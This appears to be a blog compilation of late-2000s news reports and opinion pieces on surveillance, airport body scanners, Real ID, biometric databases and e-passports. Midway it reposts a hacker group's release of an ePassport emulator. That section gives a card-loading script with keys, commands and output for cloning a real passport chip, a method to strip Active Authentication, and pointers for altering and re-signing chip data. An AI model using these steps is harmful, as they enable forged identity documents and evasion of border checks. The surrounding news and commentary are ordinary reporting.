‘Positively chilling’ says Liberty

By John Ozimek • The Register

Radical Think Tank Open Europe has this week exposed a study by the EU that could lead to the creation of a massive cross-Europe database, amassing vast amounts of personal data on every single citizen in the EU.

The scope of this project also reveals a growing governmental preference for systems capable of locking people up not for what they have done, but for what they might do.

Open Europe (OE) researcher, Stephen Booth, has been reviewing projects currently in receipt of EU funding. Last week he identified one of these - Project INDECT – as having potentially far-reaching effects for anyone living or working in Europe. The main objectives of this project, according to its own website, are:

To develop a platform for: the registration and exchange of operational data, acquisition of multimedia content, intelligent processing of all information and automatic detection of threats and recognition of abnormal behaviour or violence, to develop the prototype of an integrated, network-centric system supporting the operational activities of police officers.

In addition, it aims “to develop a set of techniques supporting surveillance of internet resources, analysis of the acquired information, and detection of criminal activities and threats.”

There are two controversial aspects to this research. First is the extent of data collection implied by the project scope. Second, and perhaps far more worrying, is the proposition that law enforcement agencies, in possession of sufficient data, will in future be able to model potentially criminal and anti-social behaviour and therefore focus on individuals before crimes are committed.

In this, it echoes another EU-sponsored piece of research – ADABTS – which is all about Automatic Detection of Abnormal Behaviour and Threats in crowded Spaces. According to the ADABTS prospectus, it “aims to develop models for abnormal and threat behaviours and algorithms for automatic detection of such behaviours as well as deviations from normal behaviour in surveillance data.”

The INDECT project is co-ordinated by Polish academic Professor Andrzej Dziech. Participants include several institutions from Poland – which until recently had its own issues with over-arching state surveillance – as well as the Northern Ireland Police Service.

Shami Chakrabarti, the director of human rights group Liberty, described this approach as a “sinister step” for any country, but “positively chilling” on a European scale.

Stephen Booth added: “The problem with the EU funding these types of projects is the lack of accountability. Citizens are left completely in the dark as to who has approved them and there is no way to ensure that civil liberties are being duly respected.

“The absence of any political debate about the use of these new surveillance technologies in our society is a very dangerous trend, which is especially acute at the EU level.”

However, the idea of punishing potential criminals is not just an EU notion. As El Regreported last year, the Home Office has certainly considered the use of automated profiling to check travellers at points of entry to the UK. This has been controversial, both because of the veiled racism implied by such a policy, as well as evidence provided to the Home Office that it might not actually work.

However, the Vetting Database – which is due to go live later this year – will take decisions on whether people are fit to work in millions of “regulated” positions on the basis of a scoring system, designed to “predict” likelihood to offend.

The introduction of predictive models into society appears to be carrying on apace, with very little public debate as to how desirable they are, or how the state should compensate citizens where mistakes occur. There is also a blurring of the lines between predicting a threat – in which case law enforcement officers can be asked to investigate – and simply predicting criminality and penalising an individual on the basis of something they have not yet done.

OE is interested in seeing less formal integration across Europe, and a return to more issues being resolved at the national level. Their investigation looked at funding provided under the Seventh Framework Programme (FP7). This can be accessed via the Cordis portal, and is a mechanism whereby funds controlled by the EU Commission are made available for research projects.

The existence of an FP7 project is not necessarily an indicator of EU policy in an area, but it is clear evidence of some interest in the approach being investigated.

Project INDECT launched on 1 January this year with a project budget of 14.86 million Euros. It is due to deliver the goods, including a 15-node pilot project, by the end of 2013. ®

 swissinfo.ch » swiss news 

Body scanners that see through clothing have been available for several years, but their introduction has been slowed in some countries by privacy concerns. The American Civil Liberties Union for example has denounced the machines as a “virtual strip search” because they display the body’s contours on a computer screen with great clarity.

New software however can protect travellers’ privacy by producing a stylised image of the body instead of a more detailed picture.

Some manufacturers already offer privacy enhancements such as blurred faces or bodily images that look like chalk outlines. 

A body scanner at Amsterdam's Schiphol airport (Keystone)

A debate has been sparked in Switzerland over installing body scanners in airports after a terrorist attempt prompted the Netherlands to roll out the machines.

The Swiss aviation authority says the scanners would be a useful security tool, but the defence minister has ruled them out.

Dutch authorities say 15 of the machines will be in use at Amsterdam’s Schiphol airport within three weeks for passengers travelling to the United States. Nigeria and Britain also plan to introduce the scanners soon.

It follows an attempt to blow up an aircraft over Detroit on Christmas Day. Nigerian terrorist Umar Farouk Abdulmutallab had boarded the Northwest Airlines plane in Amsterdam wearing the explosives under his clothes, but the device burst into flames instead of detonating. 

A key European lawmaker has called for greater use of the scanners, which capture detailed images of people’s body contours and are designed to spot explosives and other non-metallic objects that a metal detector would miss. 

Peter van Dalen, vice chairman of the European Parliament’s transport committee, said newer technology showed the scanners did not violate travellers’ privacy and urged the installation of the equipment across the 27-nation bloc. 

In 2008 the European Parliament voted against using such machines and called for further study, allowing Schiphol to conduct a pilot test of the scanners.

In Switzerland, although airport security measures were tightened over the holiday period, opinion was divided over the merits of bringing in such scanners.

“Effective tool”

The Swiss Federal Office of Civil Aviation (FOCA) said there were no plans underway to introduce the scanners in Geneva, Zurich or Basel airports, but if the machines were approved on a European level Swiss airports should follow suit. 

Spokesman Daniel Göring told Swiss radio that the scanners could be “useful and effective” as a complementary tool for existing security controls, and he backed their introduction across Europe. 

However, Defence Minister Ueli Maurer was quick to dismiss the machines. “It would be unacceptable for people to be viewed completely naked,” he told television station TeleZüri. 

Less drastic measures would be just as effective, he argued, such as improving counter-terrorism alert systems, strengthening collaboration between secret services and the international exchange of information. 

For its part Geneva airport said it was already responding to recommended security measures and it did not foresee installing the scanners as there were no convincing arguments for them in the locations where they had already been in use. 

“But if FOCA or American companies require it, we will adapt,” a spokesman said.

More privacy

Body scanners that see through clothing have been available for several years, but their introduction has been slowed in some countries by privacy concerns. The American Civil Liberties Union for example has denounced the machines as a “virtual strip search” because they display the body’s contours on a computer screen with great clarity.

New software however can protect travellers’ privacy by producing a stylised image of the body instead of a more detailed picture.

Some manufacturers already offer privacy enhancements such as blurred faces or bodily images that look like chalk outlines.

On Sunday Britain’s main airport operator BAA said it had ordered full-body scanners and would introduce them as soon as possible. BAA operates Europe’s busiest airport, Heathrow, as well as other British airports.

Travel inconveniences

Kurt Spillman, a professor in conflict research and security at the Federal Institute of Technology in Zurich, still expects body scanners to be in use in Switzerland within two to five years. 

“Switzerland will take on the standards of the EU. I think body scanning, as an additional security measure for preventing terrorist attacks, will be used for flights to the US,” he told the Neue Luzerner newspaper.

He thought the extra security step would eventually become accepted by passengers, as have other measures in place since the 9/11 attacks.

“Despite all the inconveniences such as removing shoes [at the security checks] or the ban on carrying liquids in hand luggage, people continue to travel unabated around the world,” he said.

“Body scanning slows down the check-in procedure, it’s unpleasant, but there’s no stopping it. Anyone who does not want to undergo this can stay at home.”

swissinfo.ch and agencies

BY HENRICK KAROLISZYN AND SAMUEL GOLDSMITH
DAILY NEWS WRITERS

Originally Published:Sunday, December 27th 2009, 11:11 PM
Updated: Tuesday, December 29th 2009, 1:25 PM

Some fliers say whole body scanners, which cost about $150,000 apiece, are no more invasive than a security patdown procedure.

Some fliers say whole body scanners, which cost about $150,000 apiece, are no more invasive than a security patdown procedure.

Read more:

http://www.nydailynews.com/news/national/2009/12/28/2009-12-28_fliers_favor_naked_truth_in_airport_body_scanners.html#ixzz0bZ4ftN3K

Bring on the body scans!

Beleaguered airline passengers said Sunday they have no problem with controversial new “whole body scan” machines that give screeners an undressed view of travelers.

The technology is in use at a handful of U.S. airports, including Salt Lake City and Los Angeles International, and is still being tested by the Transportation Security Administration.

“I don’t mind [the scanner] because it would be in place for safety,” said Samantha Day, 44, who flew into Kennedy Airport from London.

“It’s no more invasive than someone touching every part of your body” during existing patdown security procedures, added Marni Blitz of Robbinsville, N.J.

Opponents argue the machines violate personal privacy because they show images of the naked body. Advocates counter that they’re vital to safety – and would have detected the explosives sewn into the underwear of a Nigerian man who tried to blow up a flight over Detroit on Christmas Day.

The body imaging machines cost about $150,000. They emit some radiation, but experts say it’s far less than what passengers are exposed to on a normal flight.

Former Homeland Security chief Michael Chertoff told the Daily News that naysayers have delayed installation of the scanners.

He said the botched attack on Flight 253 shows that they are a needed weapon in the anti-terror arsenal.

“Privacy advocates and the ACLU have slowed or stopped the deployment of the machines with a barrage of objections,” Chertoff said in an e-mail. “The bad guys have figured out this vulnerability. Isn’t it time we deployed these machines?”

Read more:

http://www.nydailynews.com/news/national/2009/12/28/2009-12-28_fliers_favor_naked_truth_in_airport_body_scanners.html#ixzz0bZ4vfGUI

Submitted by MacRonin on December 13, 2009 – 7:00pm

Real ID Follies Continue with PASS ID Waiting in the Wings: Via EFF.org Updates.

Since 2007, the U.S. State Department has been issuing high-tech “e-passports,” which contain computer chips carrying biometric data to prevent forgery. Unfortunately, according to a March report from the Government Accountability Office (GAO), getting one of these supersecure passports under false pretenses isn’t particularly difficult for anyone with even basic forgery skills.

As 2009 draws to a close, we’re inching ever deeper into the corner that Congress painted us into by passing Real ID under the table in 2005. (Recall that Real ID is the failed, Bush-era attempt to turn state drivers licenses into national ID cards by forcing states to collect and store licensee data in databases, and refusing to accept non-compliant IDs for federal purposes, like boarding a plane or entering a federal building.)

The official deadline for states to comply with the Department of Homeland Security’s (DHS) final Real ID rule is December 31, 2009, and an estimated 36 states will not be in compliance by then, leading to some ambiguity for many citizens. For example, will residents of Montana be able to board planes in January 2010 with only a driver’s license (a state-supplied, technically non-compliant document) and without a passport (an identity document issued by the federal government)?

Past history strongly suggests that DHS will issue last-minute waivers to states that have not amped up their drivers licenses to adhere to Real ID. Early in 2008, states that actively opposed Real ID received waivers from DHS, nominally marking the states as “compliant” despite strongly-stated opposition to ever implementing Real ID.

But waiting in the wings is PASS ID, a bill that attempts to grease the wheels by offering money to the states to implement ID changes. Despite having the appearances of reform, PASS ID essentially echoes Real ID in threatening citizens’ personal privacy without actually justifying its impact on improving security. For this reason, PASS ID is not popular — privacy advocates refuse to support the bill because it still creates a national ID system. It still mandates the scanning and storage of applicants’ critical identity documents (birth certificates, visas, etc.), which will be stored in databases that will become leaky honeypots of sensitive personal data — prime targets for malicious identity thieves or otherwise accessible by individuals authorized to obtain documents from the database. And on the other side, short-sighted surveillance hawks are unhappy with the bill because they support the privacy violations architected into the provisions of the original Real ID Act.

As such, advocates of PASS ID are publicly wringing their hands over the deadline in order to encourage Congress to approve the PASS ID Act before the end of the year. But the fracas over health reform is suffocating any chance for meaningful debate about the merits of PASS ID before the Dec. 31st deadline.

A pragmatic analysis should show that Real ID is dead. To date, 24 states have enacted resolutions or binding legislation prohibiting participation in Real ID, and the varied, desperate efforts to reanimate it are misguided. Whether the states or the federal government signs the invoice, the cost ultimately falls to taxpayers, who should be troubled that neither Real ID nor PASS ID is likely to fulfill the stated goal of stopping terrorists from obtaining identity documents. (Just this week, noted security expert Bruce Schneier linked to a report about government investigators successfully using fake identity documents to obtain high-tech “e-passports,” which were then used to buy plane tickets, and board flights — the point being that a fancy, “secure” identity document doesn’t stop individuals from exploiting a weak bureaucracy.)

On the other hand, the resulting databases filled with scanned identity documents will, create tantalizing targets for identity thieves and headaches for people whose digital documents are pilfered; and a national ID system will invite mission creep from the government as well as private entities like credit reporting agencies and advertisers. It’s high time for reason to replace the reflexive defense of a failed scheme. Congress should repeal Real ID for real and seek more inspired, protective solutions to identity document security.

ISRAEL at Risk of Not Being a Democracy Anymore: Knesset Approves INVASIVE ‘Biometric Law’

Anyone who follows the news has no doubt come across the claim that “Israel is the only democracy in the Middle East.” Usually, this claim is followed by its logical inference: “As an island of freedom located in a region controlled by military dictators, feudal kings and religious leaders” - Not any more – Israel democracy is now controlled by superficial politicians…

Black Day for Democracy

By Gil Ronen and Nissan Ratzlav-Katz

(IsraelNN.com) The Knesset plenum approved Monday evening the ‘Biometric Law’ in the final readings. Forty Knesset members voted in favor of the law, 11 against and three abstained. The purpose of the law is the creation of a biometric database that would hold the fingerprints and facial photos of all of the country’s citizens. The data would be stored in the Interior Ministry computers.

MK Nitzan Horowitz (Meretz), who led the opposition to the law, said after its approval that the vote was “a serious mistake which causes grave harm to freedom of the individual in Israel.”

“I hope that we do not pay too heavy a price for it,” Horowitz said. “In any case, it has been proven that an unrelenting public struggle by idealists can have influence and make a difference. The proof is that the law in its final wording is completely different from the original version.”

During the Knesset debate about the law, MK Horowitz stood at the podium and held up printouts of information from the Ministry of Interior’s database which contained information about Knesset members and which reached the Internet. He said that he would not show the contents so as not to invade the MKs’ privacy. “The leaked data which reached my hands prove how easy it is to break into government databases,” he said. “I hope that this will not be the fate of the biometric database.”

MK Dov Henin (Hadash) said that despite the government’s statements that it would not force Israeli citizens to join the database, “in fact, whoever does not do so would be punished – he will not be able to leave the country’s borders, since he would not receive a passport at the level required in developed countries.” The database is not truly a voluntary one, he said.

Faked fingerprints
On the same day that the Knesset approved the law, there news from Tokyo that appeared to show that this system, too, was not foolproof. Police in the Japanese capital said that they arrested a 27-year-old Chinese woman suspected of illegally entering the country after surgically altering her fingerprints to deceive a biometric recognition system operated by immigration officials.

Commissioner warns passport office not to include biometric info on radio chips

By ALTHIA RAJ, NATIONAL BUREAU

The federal privacy watchdog has rejected Passport Canada’s plan to embed fingerprints and iris scans in electronic passports.

In a review of the project, the Office of the Privacy Commissioner told the passport office not to include new biometric information on a radio-frequency chip encoded in e-passports.

“The more information you collect, the more information you put at risk,” said assistant privacy commissioner Chantal Bernier.

She said Passport Canada “backed away” from putting more data on the chip than they currently collect.

DIGITIZED PICTURE

E-passports will feature a digitized picture of the passport holder as well as their name, date of birth, location of birth and passport number, said Passport Canada spokesman Jean-Sebastien Roy.

A national rollout of the e-passport is expected to begin in 2011.

“(They provide) greater protection against fraudulent misuse and tampering, and reduce the risk of identity fraud,” Roy said.

The privacy commissioner’s review raised concerns about whether the chip is “adequately protected against unauthorized interception,” such as skimming and eavesdropping. The watchdog noted an e-passport hacking case in the United Kingdom.

“If the data can be readily copied and replicated, electronic passports may do more to facilitate identity theft than to prevent it,” said Jason Gratl of the B.C. Civil Liberties Association.

The passport office said its chip can only be read 10 cm away.

‘HIGH RISKS’

David Harris, former chief of strategic planning for the Canadian Security Intelligence Service (CSIS), said there are “high risks” associated with electronic databases, but comprehensive information such as biometrics in passports are needed to guard against terrorist threats.

“We’ve got to be all the more careful in doing what might prove to be unavoidable,” he said.

Canadian e-passports were developed after the International Civil Aviation Organization adopted new requirements for an embedded chip in 2005.

Privacy advocates say the chip raises additional concerns, such as the potential to build databases that track travellers across national boundaries.

“It substantially increases the powers of the state to survey individuals,” said University of Toronto professor Andrew Clement. Databases are often created with one goal and then used for other purposes, he said.

Richard Rosenberg of the Freedom of Information and Privacy Association said he is concerned Canadians won’t be able to check the accuracy of the information on the chip and risk being unfairly blacklisted like many travellers on the no-fly list.

The passport office said it has no plans to collect or use the information in other ways and promised to investigate options to allow individuals to access the data on their chip.

ALTHIA.RAJ@SUNMEDIA.CA

THC/vonJeek proudly presents an ePassport emulator. This emulator applet
allows you to create a backup of your own passport chip(s).


The government plans to use ePassports at Immigration and Border
Control. The information is electronically read from the Passport
and displayed to a Border Control Officer or used by an automated
setup. THC has discovered weaknesses in the system to (by)pass the
security checks. The detection of fake passport chips does not
work. Test setups do not raise alerts when a modified chip
is used. This enables an attacker to create a Passport with an
altered Picture, Name, DoB, Nationality and other credentials.

The manipulated information is displayed without any alarms going off.
The exploitation of this loophole is trivial and can be verified using
thc-epassport.

Regardless how good the intention of the government might have been, the
facts are that tested implementations of the ePassports Inspection System
are not secure.

ePassports give us a false sense of security: We are made to believe
that they make usemore secure. I'm afraid that's not true: current
ePassport implementations don't add security at all.

Thanks to Elv1s for beta testing!

Just follow two easy steps:

(1) Upload the emulator code to a blank JCOP v4.1 72k smart card
Use your favorite tool to upload the CAP file. As an example GPShell is
used. The script used to upload the CAP file:

P:\GPShell-1.4.2>type epassport.script
mode_211
enable_trace
establish_context
// edit the following line to match your PCSC reader
card_connect -readerNumber 3
select -AID A000000003000000
open_sc -security 3 -mac_key 404142434445464748494A4B4C4D4E4F -enc_key 404142434445464748494A4B4C4D4E4F -kek_key 404142434445464748494A4B4C4D4E4F
delete -AID A00000024710
install -file epassport.cap -priv 2
card_disconnect
release_context

A sample output of an actual upload:

P:\GPShell-1.4.2>GPShell.exe epassport.script
mode_211
enable_trace
establish_context
card_connect -readerNumber 3
* reader name OMNIKEY CardMan 5x21-CL 0
select -AID a000000003000000
Command --> 00A4040008A000000003000000
Wrapped command --> 00A4040008A000000003000000
Response <-- 6F108408A000000003000000A5049F6501FF9000
..
..
..
Wrapped command --> 84E60C002506A0000002471007A000000247100107A00000024710010100
02C90000B918E8E43A25117700
Response <-- 9000
card_disconnect
release_context

The CAP file currently supports the following files:

 * EF.COM :    32 bytes (required file)
 * EF.SOD :  2560 bytes (required file)
 * EF.DG1 :    96 bytes (required file)
 * EF.DG2 : 24576 bytes (required file)
 * EF.DG11:    64 bytes (optional, e.g. USA)
 * EF.DG12:    96 bytes (optional, e.g. USA)
 * EF.DG13:    96 bytes (optional, e.g. Japan, France)
 * EF.DG15:   192 bytes (optional, e.g. The Netherlands)

If you need support for other / larger DGs, please let vonJeek know.

(2a) Clone the chip
Using a customized THC version of Adam Laurie's RFIDIOt tools, you're able
to read a chip's content and to write it to an emulator.

P:\RFIDIOt-vonjeek>mrp0wn.py CLONE M3V0NJ33K000000999999

===============================================================================
= mrp0wn.py, an RFIDIOt ePassport utility by vonJeek <mailto:vonjeek@thc.org> =
= Use Jeroen van Beek's ePassport emulator as the target device.              =
===============================================================================
Put a ePassport near the terminal and press enter to continue...
Reading document using KEY M3V0NJ33K000000999999, please be patient...
Put the emulator near the terminal and press enter to continue...
Writing new ePassport using files in /tmp.
Writing /tmp/EF_COM.BIN: 0 bytes left...
Writing /tmp/EF_SOD.BIN: 0 bytes left...
Writing /tmp/EF_DG1.BIN: 0 bytes left...
Writing /tmp/EF_DG2.BIN: 0 bytes left...
Setting the secret key to M3V0NJ33K200000009999998.

Done, happy mrp0wning  

Use the following command to read the chip:
./mrpkey.py "M3V0NJ33Kxxxx000000xx999999xxxxxxxxxxxxxxxxx"

If your chip is protected using the optional Active Authentication mechanism,
the Active Authentication data group (DG15, tag 0x6F) is removed from EF.COM
as demonstrated by Jeroen van Beek at the 2008 USA BlackHat Briefings. Note
that mrp0wn.py's parameter 'STRIP_AA' must be set to the value 'True'. This
attack will work on all inspection system implementations that are using e.g.
ICAO's "worked examples", see this site for more info on that.

(2b) Write saved data
It's also possible to write chip data you've saved earlier using RFIDIOt's
mrpkey.py. As an example you can use vonJeek's ePassport data. Note that
this data is self-signed: vonJeek started his own country 

P:\tmp>unzip vonjeek-epassport_dump.zip
Archive:  vonjeek-epassport_dump.zip
 extracting: EF_COM.BIN
  inflating: EF_DG2.BIN
  inflating: EF_DG1.BIN
 extracting: EF_SOD.BIN 

P:\>cd \RFIDIOt-vonjeek 

P:\RFIDIOt-vonjeek>mrp0wn.py WRITE /tmp

===============================================================================
= mrp0wn.py, an RFIDIOt ePassport utility by vonJeek ;lt;mailto:vonjeek@thc.org> =
= Use Jeroen van Beek's ePassport emulator as the target device.              =
===============================================================================
Document type is PASSPORT.
Put the emulator near the terminal and press enter to continue...
Writing new ePassport using files in /tmp.
Writing /tmp/EF_COM.BIN: 0 bytes left...
Writing /tmp/EF_SOD.BIN: 0 bytes left...
Writing /tmp/EF_DG1.BIN: 0 bytes left...
Writing /tmp/EF_DG2.BIN: 0 bytes left...
Setting the secret key to M3V0NJ33K200000009999998.
Done, happy mrp0wning  

Use the following command to read the chip:
./mrpkey.py "M3V0NJ33Kxxxx000000xx999999xxxxxxxxxxxxxxxxx"

You can also alter data before writing it to an emulator chip. If you want
to do that: this document contains details about - amongst others - DG1 and
DG2 encoding. If you've updated the DGs you can sign them using Peter
Gutmann's CryptLib. 

A read-out of vonJeek's ePassport chip using the reference implementation
named Golden Reader Tool can be seen below.

If you're interested in ePassport related PKI (how to verify whether chip
content is signed by a bonafide authority?) please check the following URLs:

* http://www2.icao.int/en/MRTD/Pages/icaoPKD.aspx
* http://www.icao.int/icao/en/atb/meetings/2008/TagMRTD18/TagMrtd18_ip04.pdf
* http://www.csca-si.gov.si/TR-PKI_mrtds_ICC_read-only_access_v1_1.pdf
* http://www.timesonline.co.uk/tol/news/uk/crime/article4467106.ece
* http://www.timesonline.co.uk/tol/news/uk/crime/article4467098.ece 

Yours sincerly,

vonjeek [at] thc dot org
The Hackers Choice

http://www.thc.org

Australia Post has revealed plans to introduce new technology to allow Post Office staff to take fingerprints, biometric scans and digital signatures from customers applying for services such as bank accounts and passports.

The new Identification Services Program Project is expected to be adopted at all 4,443 retail Post outlets, but is currently being tested at 25 Australia Post-owned outlets across NSW and Western Australia.

If approved by State and Federal Governments, Australia Post would become the first non-law-enforcement organisation to take digital fingerprints for commercial purposes.
The power is currently limited to law enforcement Agencies, the Courts, spy Agencies and the Defence Force.
Spokesperson for Australia Post, Alex Twomey was reported in the press as confirming fingerprinting capabilities would be introduced over the next two years and that staff would be trained in protocols for storing and transmitting customer information.
“Fingerprint information will be stored for six hours at the outlet and then transferred for storage at a central Australia Post database,” Mr Twomey said.
“Under Agency agreements, we would then be required to wipe the information after it was sent to Government Departments or other corporate clients.”
According to reports, Australia Post plans to install the data capture equipment at 375 of its own outlets by the end of June 2010, followed by another 400 in 2011 and then 2,000 privately managed post offices nationwide.
Funding for the Identification Services Program project trial was approved in March 2009.
Chairman of the Australian Privacy Foundation, Dr Roger Clarke said he was concerned over the lack of public discussion surrounding the new system.

“These types of initiatives are just too important to introduce without public discussion,” Dr Clarke said.

He said “securing fingerprints and other data across such a large retail network was a major concern as it would be difficult to design a system to protect all information”.

By Jennifer Carlisle

A national biometric database in place of our current flawed identification systems could prevent the loss of liberty and autonomy.

Defending the privacy of our personal data has become more challenging since September 11. Our lives are already tracked and measured in so many ways and our identities can be stolen and abused so easily that the addition of biometric identifiers, as being implemented this year in Hong Kong, seem like the proverbial “last straw.” Paradoxically, a true national biometric identification system may hold the key to guaranteeing and protecting our rights to privacy. A single national biometric database, replacing the currently flawed systems used for drivers’ licenses, Social Security and passports, may be the best way to protect our privacy and enable us to regain control over who tracks us and who gets access to what data about us.

While writing an honors thesis at USC, I conducted a year-long research study on personal data privacy. Neither legislation nor technology seemed to offer a solution that was both feasible and acceptable to all parties. Most special interests in this country favor weak legislation, and new “security technology” tends to facilitate invasion of privacy rather than its protection. I first examined in detail the EU Privacy Directive and various US responses and then focused on the privacy aspects of the 2001 HIPAA legislation. No major breakthroughs or improvements seemed likely.

As my research progressed, I realized that one of the greatest threats to privacy is flawed security of information, which is compounded by our inability to reliably identify individuals. The fundamental flaws in our identification system allow personal data to be incorrectly correlated, accessed by individuals without the proper clearance and, worse, for others to pretend to be someone they are not. I realized that a significant improvement in personal privacy could be achieved by fundamentally improving the way we identify ourselves. Instead of relying on passwords, tokens, smart cards and other identifiers, which can easily be stolen or forged, we need to be able to identify ourselves based on biometrics (i.e., the use of physical or behavioral characteristics such as fingerprints, iris scans, voice signatures, face scans, etc).

Since the terrorist attacks on the World Trade Center and the Pentagon, there have been numerous proponents of biometric identifiers. But if we have many systems (e.g., DMV, INS, criminal system, airports, sports arenas, schools and Social Security — all of whom now propose to begin using such identifiers in parallel) then who is to say which is the correct identifier and who is to validate the accuracy of the ID databases? I am loath to trust the DMV and airport security to verify identities.

I came to realize that the greatest risk to society is not the creation of databases — many of which are essential to our modern lifestyles; rather it is the inadequate protection of data. This led me to a paradox; that our privacy can be better protected though the creation of a universal biometric identification database and that our privacy is far more likely to be compromised by the current plethora of poorly managed, decentralized identity databases. Most Americans have already contributed data to dozens of databases and we are enticed daily to sign away our rights to protect those data. Concealing our identity is not really an option. Rather, the first step in privacy protection is to provide a means of absolute identification, thereby preventing others from impersonation and identity theft. The second step is to overhaul the laws protecting the data collected about us and the third step is to improve cyber security.

There is a great fear of databases by privacy experts due to the increasing access of corporations, the government, hackers and criminals to our personal data. While some of this access is legitimate, in many cases, data can be misused for unauthorized secondary purposes. Corporate and government abuse can be prevented by stronger laws limiting the use of personal data and by better enforcement of these laws. The European Union has passed a comprehensive Privacy Directive, with which US firms must comply when doing business there. The US has adopted a similar model in recent HIPAA legislation, defining the methods for protecting and sharing health data. US laws protecting privacy of financial data leave a great deal to be desired. Our greatest protection from government abuse seems to be the unwillingness of agencies to share data and the primitive nature of the systems they use. Laws and government regulations will not stop hackers and criminals, who gain illegal access to personal data in many ways. Sometimes individuals are careless (e.g., we sell a computer without erasing the disk, send email to the wrong address, leave a list of passwords on our desk or throw it away.) Devious people can access our personal data by gaining access to an administrator account, by hacking into a system or by identity theft. Carelessness can be discouraged through education and penalties, but theft and misuse of the data can only be reduced by means of a better system of identification and access authorization.

In America today, it is far too easy to conceal our own identity or assume the identity of another for the purpose of doing wrong. An individual can steal an identity by obtaining some easily discovered pieces of information about a person or by stealing a card or token that is used to identify the individual. To protect our identity, which is crucial in protecting our privacy, there must be a form of identification that cannot be learned, stolen or forged. The only effective means of accomplishing this is the use of biometrics.

Biometrics uses a digital measurement of a physical characteristic or personal behavioral trait to recognize the identity, or verify the claimed identity, of an individual. Some characteristics that apply themselves well to biometrics are iris scans, fingerprints, voice signatures, retinal scans and face prints. Unless a thief is willing to undergo reconstructive surgery or has extremely sophisticated electronic equipment, it is extremely difficult to fake biometrics, especially if biometrics identification is combined with human monitoring. By this I mean that a security team is checking to ensure that individuals are actually presenting themselves for identification, and not say, hooking up a small computer loaded with other people’s biometrics, to try to fool the scanner. Even if biometrics are less than 100 percent perfect, they offer far better identity verification than the easily-counterfeited driver’s licenses, Social Security numbers and passports.

There is a great distrust of biometrics by privacy advocates. There is a strong fear of Orwell’s Big Brother. However, these concerns can largely be alleviated with the creation of laws, enforcement agencies and monitoring to ensure that the government and corporations do not misuse the data. We do not live in an authoritarian country, but rather a democracy with numerous checks and balances. The key to preventing the loss of our liberty and autonomy is not to prevent the spread of technology, but rather to ensure that it is used properly and in a transparent nature. The development of biometrics should be treated similarly to the development of genetics. It is for the good of society that we learn how to use these technologies, but it needs to be done with observation from government and private watchdog groups to ensure that the technology is not abused. Biometrics is one of the areas that should not be left to market forces and self-regulation as it has been so far.

Once we have reached agreement on the need for biometrics to be used for identification, we still need to prevent a thief from attaching his biometrics to your identity in the many databases that currently exist and are under development. The only viable solution is to have a single, universal biometric identity database, which in turn provides verification to multiple, diverse and distributed databases. Establishing biometric identities with dozens of organizations is inefficient, wasteful, and fails to solve the main problem of preventing identity theft.

The DMV, the Social Security office, the passport office, our local airport and our various dentists and doctors are ill suited to establishing a person’s identity. They would benefit from having that identity pre-established and using it to issue their own cards and administering their systems. They could each use a different numbering system, confident that each person is uniquely and accurately identified biometrically. Repeating our information to every group opens the door to forgeries and allows aliases in different systems. How would we settle identity disputes? Are we to carry as many biometric smart cards as we currently carry credit and ID cards?

The logical solution to these problems is the creation of a single system devoted to identification. This National Biometric Identification System should be managed and certified by a government agency, to ensure accuracy and so that identifiers of known criminals, terrorists and holders of passports, travel visas, etc. can be integrated. This system must be managed at a national level, but would be linked into other national and international systems by common standards. To get it approved by Congress, new legislation would be required to define access, security and strong redress for abuses. Rather than threatening our liberty, this may actually be a catalyst for increasing our protection rights regarding our personal data, most of which we have little control over today. I had to get special permission to focus on and advocate such a system for my honor’s thesis, but I believed it was more important to follow my instincts and passion and propose something constructive and innovative, than to do a traditional policy analysis. It amazed me that in this age of databases, public debate is still focused on the idea of a national ID card rather than an ID database.

Unlike an identity card, which can be stolen or forged, a national database would provide the necessary structure to certify the identity of all Americans and legal visitors. The government should create and maintain a database of biometric identifiers along with each person’s name, unique identification number and several other identifying characteristics, such as eye color and birth date. But that is all. This national database could be carefully guarded and offered via a distributed system for remote verification and for generation of identity cards. This would replace the use of the SSN in many databases.

A national biometric identification system (BIS) should not be used to store behavioral or judgmental data. The BIS should not be used to record and store health, criminal, motor vehicle registration, social security, financial or travel data. Separate systems should continue to manage such databases — each of which should be regulated and secured appropriately. Assembly of behavioral data into one large database should be prohibited. Sharing and aggregating data should be done under strict regulations.

The new universal identity database must be kept simple and secure so it can support many different applications efficiently. For example, the airline industry could access this system to verify the identity of individuals checking in. First, the airline would access the BIS to confirm each passenger’s identity by running a one-to-one match against the biometric database. Then they could check him in for his flight. A third step would be to use the identity number to search a travel alert database to see if each individual is on a risk list of criminals or terrorists. This would allow rapid, yet comprehensive, security checks. The use of biometrics, checked against a secure national database, makes it almost impossible for individuals to use forged identification papers. Of course the database must be developed under strict federal guidelines and maintained in utmost security.

Efficient use requires technology similar to that used for site name recognition on the Internet. A distributed, redundant, secure, high-speed access network can serve many database applications simultaneously. Security is accomplished in two parts, physical and technical. Physical security protects the actual building from intrusion, which is critical in preventing the theft of passwords and access codes. Technical security protects the system from electronic invasion, usually through a network or over the Internet.

It has long been argued that technology is leading to the end of privacy. Rather it is our desire for convenience and our dependence on medical, financial, travel and government systems that has led to the creation of databases that, if poorly managed and protected, threaten our privacy and the loss of our very identity. The best solution to ensure that we can protect our personal data in the future would be national legislation to establish a universal biometric identification system — concurrent with strict restrictions on use of data in all systems that access it.

George Lekakis |  From:Herald Sun |  Tue Oct 20 00:00:00 EST 2009 Tue Oct 20 00:00:00 EST 2009

AUSTRALIA Post is introducing new technology that will enable staff at its 4443 retail outlets to take fingerprints, biometric scans and digital signatures from customers applying for bank accounts, passports and other services.

The Government-owned corporation is secretly testing the Big Brother technology at 25 outlets after its directors approved funding for the project at a March board meeting.

Documents seen by the Herald Sun show Australia Post plans to install the data capture equipment at 375 outlets by the end of June followed by another 400 in 2011.

Trials for the “Identification Services Program Project” are being held at 25 Australia Post-owned outlets in NSW and Western Australia, but the corporation is also planning to install the technology at 2000 privately managed post offices nationwide.

Privacy advocates are worried the new system may create fresh opportunities for organised criminals to exploit weaknesses in the network.

If state and federal governments approve the plan, Australia Post would become the first local organisation allowed to take digital fingerprints for commercial purposes. The power is limited to law enforcement agencies, the courts, spy agencies and the defence force.

Even though the project has been under development for more than six months, the corporation has kept a tight lid on it. There was no specific disclosure about it in Australia Post’s annual report tabled in Federal Parliament last week.

Australia Post spokesman Alex Twomey confirmed fingerprinting capabilities would be introduced over the next two years and that staff would be trained in protocols for storing and transmitting customer information.

“Fingerprint information will be stored for six hours at the outlet and then transferred for storage at a central Australia Post database,” he said. “Under agency agreements, we would then be required to wipe the information after it was sent to government departments or other corporate clients.”

Privacy groups said yesterday they were horrified.

